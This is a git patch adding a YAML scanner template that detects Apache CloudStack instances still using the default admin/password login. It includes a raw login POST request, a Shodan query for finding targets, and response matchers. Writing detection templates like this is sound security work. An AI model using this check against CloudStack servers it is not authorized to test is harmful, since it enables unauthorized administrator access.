From 6c2b232eb0d2987d27067c713117a8dbb42fae10 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Tue, 30 Jul 2024 20:35:54 +0530
Subject: [PATCH] Create cloudstack-default-login.yaml

---
 .../apache/cloudstack-default-login.yaml      | 40 +++++++++++++++++++
 1 file changed, 40 insertions(+)
 create mode 100644 http/default-logins/apache/cloudstack-default-login.yaml

diff --git a/http/default-logins/apache/cloudstack-default-login.yaml b/http/default-logins/apache/cloudstack-default-login.yaml
new file mode 100644
index 0000000000..c8f8d8e26f
--- /dev/null
+++ b/http/default-logins/apache/cloudstack-default-login.yaml
@@ -0,0 +1,40 @@
+id: cloudstack-default-login
+
+info:
+  name: Apache CloudStack - Default Login
+  author: DhiyaneshDK
+  severity: high
+  description: |
+    CloudStack instance discovered using weak default credentials, allows the attacker to gain admin privilege.
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.title:"Apache CloudStack"
+  tags: default-login,apache,cloudstack
+
+http:
+  - raw:
+      - |
+        POST /client/api/ HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json, text/plain, */*
+        Content-Type: application/x-www-form-urlencoded
+
+        command=login&username={{username}}&password={{password}}&domain=%2F&response=json
+
+    attack: pitchfork
+
+    payloads:
+      username:
+        - admin
+      password:
+        - password
+
+    host-redirects: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(content_type, 'application/json')"
+          - "contains_all(body, 'sessionkey','domainid','userid')"
+        condition: and